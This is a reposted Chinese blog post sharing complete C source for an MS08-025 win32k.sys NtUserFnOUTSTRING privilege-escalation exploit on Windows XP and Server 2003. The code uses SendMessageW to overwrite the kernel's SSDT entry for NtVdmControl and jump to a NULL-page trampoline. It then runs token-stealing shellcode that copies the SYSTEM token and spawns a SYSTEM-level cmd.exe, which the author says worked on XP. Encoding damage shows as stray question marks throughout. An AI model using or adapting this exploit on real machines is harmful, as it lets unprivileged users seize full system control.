<?xml:namespace prefix = o ns = "urn:schemas-microsoft-com:office:office" />

以下消息來自幻影論壇[Ph4nt0m]郵件組 ? [url]http://hi.baidu.com/vessial/blog/item/4ae4291b46f8e91c8718bfc2.html[/url]

?

?

歡迎轉載，但希望大家注明出處和保留其完整性，謝謝：）


MS08-025 win32k.sys NtUserFnOUTSTRING Privilege Escalation Exploit
另一種利用方式，通過覆蓋SSDT表NtVdmControl的地址進行shellcode的執行

#include <stdio.h>
#include <windows.h>

typedef LONG NTSTATUS;
typedef NTSTATUS (NTAPI *PNTALLOCATE)(HANDLE?????????????? ProcessHandle,
?????????????????????????????????????? PVOID??????????? *BaseAddress,
?????????????????????????????????????? ULONG??????????????? ZeroBits,
?????????????????????????????????????? PULONG?????????? RegionSize,
?????????????????????????????????????? ULONG??????????????? AllocationType,
?????????????????????????????????????? ULONG??????????????? Protect );
typedef NTSTATUS (NTAPI *ZWVDMCONTROL)(ULONG, PVOID);
void ErrorQuit(char *msg)
{
??? printf("%s:%x\n", msg, GetLastError());
??? ExitProcess(0);
}
ZWVDMCONTROL??? ZwVdmControl=NULL;
OSVERSIONINFOEX OsVersionInfo;

_declspec(naked) int ShellCode()
{

????? if ( OsVersionInfo.dwMinorVersion == 1 ) {

?????? __asm {

?????????????? nop
?????????????? nop
?????????????? nop
?????????????? nop
?????????????? nop
?????????????? nop

?????????????? mov eax,0xFFDFF124 // eax = KPCR (not <?xml:namespace prefix = st1 ns = "urn:schemas-microsoft-com:office:smarttags" />3G Mode)
?????????????? Mov eax,[eax]

?????????????? mov esi,[eax+0x220]
?????????????? mov eax,esi

searchXp:

?????????????? mov eax,[eax+0x88]
?????????????? sub eax,0x88
?????????????? mov edx,[eax+0x84]
?????????????? cmp edx,0x4 // Find System Process
?????????????? jne searchXp

?????????????? mov eax,[eax+0xc8] // 獲取system進程的token
?????????????? mov [esi+0xc8],eax // 修改當前進程的token

?????????????? ret 8

?????? }
?? }
?? if ( OsVersionInfo.dwMinorVersion == 2 ) {

?????? __asm {

?????????? nop
?????????????? nop
?????????????? nop
?????????????? nop
?????????????? nop
?????????????? nop

?????????????? mov eax,0xFFDFF124 // eax = KPCR (not 3G Mode)
?????????????? Mov eax,[eax]

?????????????? mov esi,[eax+0x220]
?????????????? mov eax,esi

search2003:

?????????????? mov eax,[eax+0x98]
?????????????? sub eax,0x98
?????????????? mov edx,[eax+0x94]
??????????????? cmp edx,0x4 // Find System Process
?????????????? jne search2003

?????????????? mov eax,[eax+0xd8] // 獲取system進程的token
?????????????? mov [esi+0xd8],eax // 修改當前進程的token
?????????????? ret 8

?????? }
?? }


}

void InitTrampoline()
{

?? PNTALLOCATE NtAllocateVirtualMemory;
?? LPVOID?????? addr = (LPVOID)3;
?? DWORD?????? dwShellSize=0x1000;
?? unsigned char trampoline[]="\x68\x00\x00\x00\x00" //push 0x0
?????????????????????????????? "\xc3";?????????????? // retn

?? NtAllocateVirtualMemory = (PNTALLOCATE) GetProcAddress(GetModuleHandle("ntdll.dll"),"NtAllocateVirtualMemory");

?? if( !NtAllocateVirtualMemory )
?????? exit(0);

?? NtAllocateVirtualMemory(?? (HANDLE)-1,
?????????????????????????????? &addr,
?????????????????????????????? 0,
?????????????????????????????? &dwShellSize,
?????????????????????????????? MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN,
?????????????????????????????? PAGE_EXECUTE_READWRITE );

?? if( (PULONG)addr )
?? {
?????? printf("\n[++] Error Allocating memory\n");
?????? exit(0);
?? }


?? *(PULONG*)(trampoline+1)=(PULONG)ShellCode;
?? memcpy(NULL,trampoline,sizeof(trampoline)-1);
}
int Callback_Overview()
{
?? printf("\n");
?? printf("=====================================================================?? \n");
?? printf("\t\tMicrosoft Windows XP SP2 - MS08-025 -?????? \n");
?? printf("\twin32k.sys NtUserFnOUTSTRING Privilege Escalation Exploit?? \n");
?? printf("=====================================================================?? \n");
?? printf("+ References:\n");
?? printf(" [url]http://www.microsoft.com/technet/security/bulletin/ms08-025.mspx[/url]\n");
?? printf(" [url]http://hi.baidu.com/vessial[/url]\n\n");
?? return 1;
}

void GetFunction()
{
??? HANDLE??? hNtdll,hNtos;
???
??? hNtdll = LoadLibrary("ntdll.dll");
??? if(hNtdll == NULL)
??????? ErrorQuit("LoadLibrary failed.\n");
???????
??? ZwVdmControl = (ZWVDMCONTROL)GetProcAddress(hNtdll, "ZwVdmControl");
??? if(ZwVdmControl == NULL)
??????? ErrorQuit("GetProcAddress failed.\n");
??????????????
??? FreeLibrary(hNtdll);
}
int main(int argc, char **argv)
{

?? //PULONG?? PntVdmControl=0x805F0DB0;
??? char*?? PntVdmControl=0x80502460; //通過*(PULONG)(KeServiceDescriptorTalbe)+0x10c*4獲得
???
????
?? STARTUPINFOA??????????????? stStartup;
?? PROCESS_INFORMATION??????????? pi;


?? Callback_Overview();
?? GetFunction();
?? RtlZeroMemory( &OsVersionInfo, sizeof(OsVersionInfo) );
?? OsVersionInfo.dwOSVersionInfoSize = sizeof(OSVERSIONINFOEX);
?? GetVersionEx ((OSVERSIONINFO *) &OsVersionInfo);

?? if ( OsVersionInfo.dwMajorVersion != 5 ) {

?????? printf( "Not NT5 system\n" );
?????? ExitProcess( 0 );
?? }
?? //Get Operatiny System Version
???????
?? InitTrampoline();

?? SendMessageW( GetDesktopWindow(), WM_GETTEXT, 0x80000000, (char*)PntVdmControl );
?? SendMessageW( GetDesktopWindow(), WM_GETTEXT, 0x80000000, (char*)PntVdmControl+2);
?? printf("\n[+] Executing Shellcode...\n");

?? ZwVdmControl(0, NULL);
?? GetStartupInfo( &stStartup );

?? CreateProcess( NULL,
?????? "cmd.exe",
?????? NULL,
?????? NULL,
?????? TRUE,
?????? NULL,
?????? NULL,
?????? NULL,
?????? &stStartup,
?????? &pi );?? //此時創建的cmd.exe是SYSTEM權限

??
?? printf("[+] Exiting...\n");

?? return TRUE;
}
我在XP測試成功，下面的第一個cmd是SYSTEM權限，這是我們提權后的，一個cmd是test權限

?

?

轉載于:https://blog.51cto.com/netwalk/72233

總結

以上是生活随笔為你收集整理的MS08-025 win32k.sys NtUserFnOUTSTRING Privilege Escalation Exploit的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。